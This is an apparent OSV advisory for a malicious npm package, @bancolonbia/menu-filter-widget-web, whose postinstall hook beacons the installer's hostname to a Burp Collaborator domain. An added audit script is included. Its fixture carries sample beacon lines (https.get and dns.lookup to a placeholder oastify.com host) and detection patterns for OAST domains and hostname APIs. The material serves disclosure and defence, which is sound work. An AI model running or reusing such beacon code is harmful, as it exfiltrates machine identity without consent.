MAL-2026-5344

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@bancolonbia/menu-filter-widget-web/MAL-2026-5344.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5344
Published
2026-06-09T09:20:38Z
Modified
2026-06-09T21:01:33.341652429Z
Summary
Malicious code in @bancolonbia/menu-filter-widget-web (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (76511e7873dc4a76b8447f91807e48289877ee612cd0d94526206390bbda7f3e)

package.json declares scripts.postinstall: node ./callback.js, which fires automatically on npm install. callback.js reads the installer's hostname and transmits it to a hardcoded Burp Collaborator domain (3y294ed4dfq501wnmdvbakcnwe25qvek.oastify.com) via two channels: an HTTPS GET to /<token>/<encodeURIComponent(host)> and a DNS lookup against a subdomain encoding the same token + hostname. The package self-describes as an "authorized security research PoC" but is published under the @bancolonbia scope (a likely typosquat of the Bancolombia corporate namespace), matching the classic dependency-confusion shape: a private-looking scoped name registered publicly so a misconfigured internal build resolves to this package and beacons victim identity to the researcher/attacker. Whether or not the operator is authorized by Bancolombia, any third party who installs this package has their hostname exfiltrated to an attacker-controlled Collaborator endpoint without consent.
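The install-time beacon described above lends itself to a simple pre-install triage check. The following is an added example, not code from the OSV record or from the package: it parses a package's package.json for lifecycle hooks and scans the script each hook runs for Collaborator-style domains and the Node APIs a hostname beacon needs. The package.json and callback.js inputs are constructed inline with a placeholder domain, and the OAST domain list and API patterns are the author's assumptions, not an exhaustive set.

```javascript
// Constructed sample input, modelled on the package.json / callback.js
// shape described in the advisory (placeholder domain, not the real indicator).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: '@example-scope/widget',
  version: '0.0.1',
  scripts: { postinstall: 'node ./callback.js' },
});
const SAMPLE_FILES = {
  'callback.js': [
    "const os = require('os'); const https = require('https'); const dns = require('dns');",
    "const host = os.hostname();",
    "https.get('https://TOKEN.oastify.com/' + encodeURIComponent(host));",
    "dns.lookup(host + '.TOKEN.oastify.com', () => {});",
  ].join('\n'),
};

const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];
// Out-of-band interaction domains commonly used by install-time beacons (assumed list).
const OAST_DOMAINS = ['oastify.com', 'burpcollaborator.net'];
// Node APIs that, taken together, make up a hostname beacon.
const BEACON_APIS = [
  { label: 'reads hostname', re: /os\.hostname\s*\(/ },
  { label: 'HTTP(S) request', re: /https?\.(get|request)\s*\(/ },
  { label: 'DNS lookup', re: /dns\.(lookup|resolve\w*)\s*\(/ },
];

// Returns human-readable findings for one extracted package.
// pkgJsonText: contents of package.json; files: { relativePath: contents }.
function auditPackage(pkgJsonText, files) {
  const findings = [];
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  for (const hook of LIFECYCLE) {
    if (!(hook in scripts)) continue;
    const cmd = scripts[hook];
    findings.push(`lifecycle script ${hook}: ${cmd}`);
    // Match "node ./x.js", "node x.js" and the whitespace-mangled "node./x.js".
    const m = cmd.match(/\bnode\s*(?:\.\/)?([\w.\/-]+\.js)\b/);
    if (!m) continue;
    const target = m[1];
    const src = files[target] ?? files['./' + target];
    if (src === undefined) { findings.push(`${hook} runs ${target}, which is not in the package`); continue; }
    for (const d of OAST_DOMAINS) if (src.includes(d)) findings.push(`${target} references OAST domain ${d}`);
    for (const { label, re } of BEACON_APIS) if (re.test(src)) findings.push(`${target} ${label}`);
  }
  return findings;
}

// Example run over the constructed sample.
console.log(auditPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES));
```

Run this over the extracted tarball (npm pack, then inspect) before installing, or turn it into a registry-side check; the install hook itself never executes.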

Source: ossf-package-analysis (fff12ed8f9f042d996b7c1167a9987b941eedcdedd7dbc2065579c4394e5b8b6)

The OpenSSF Package Analysis project identified '@bancolonbia/menu-filter-widget-web' @ 0.0.1 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.0.1"
            ],
            "sha256": "fff12ed8f9f042d996b7c1167a9987b941eedcdedd7dbc2065579c4394e5b8b6",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-09T09:20:38Z",
            "import_time": "2026-06-09T10:41:56.224884127Z"
        },
        {
            "id": "IN-MAL-2026-005240",
            "import_time": "2026-06-09T20:45:58.996454307Z",
            "sha256": "3cca61c689abd692e18d4d07a8daed2b9e6d0b27348a20804f6422ffc1cce978",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T20:43:20Z",
            "versions": [
                "0.0.1"
            ]
        },
        {
            "id": "IN-MAL-2026-005239",
            "import_time": "2026-06-09T20:45:58.783658545Z",
            "sha256": "76511e7873dc4a76b8447f91807e48289877ee612cd0d94526206390bbda7f3e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T20:43:20Z",
            "versions": [
                "0.0.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @bancolonbia/menu-filter-widget-web

Package

Name
@bancolonbia/menu-filter-widget-web
Purl
pkg:npm/%40bancolonbia%2Fmenu-filter-widget-web

Affected ranges

Affected versions

0.*
0.0.1

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@bancolonbia/menu-filter-widget-web/MAL-2026-5344.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "callback.js",
            "sha256": "a1796ad3ed640844791551a0cfc9aabe691ec7ffe3431212c70e3c061254260b",
            "tlsh": "b601c2fe06c4c73c594035c1e156543ae1abf244718699f0b46f321243e657626734f9"
        },
        {
            "path": "package.json",
            "sha256": "43e2aea1b070a51a39ac3ee0be364a3160786de0d3b0f3dc37e866d2445f5c00",
            "tlsh": "30d0a7b05d0346773cd1ff9b0932429e5578cf197649852d19f16364846a9f4417136d"
        }
    ],
    "package_integrity": [
        {
            "filename": "menu-filter-widget-web-0.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-D3bjH6oQbez4IFEq0UDAnAHVJtHwy8EQRexa0wGsDEGT0b1DU3vmFaHvhFFY8lgbvWtjbvINdKZYD3WmYR1Usw==",
                "sha1": "46e98db4f946069b86db6c0c0eb9b02151f62c1a"
            }
        }
    ],
    "domains": [
        "3y294ed4dfq501wnmdvbakcnwe25qvek.oastify.com",
        "poc-widget-001.scan-85faf31ba8d1.3y294ed4dfq501wnmdvbakcnwe25qvek.oastify.com"
    ]
}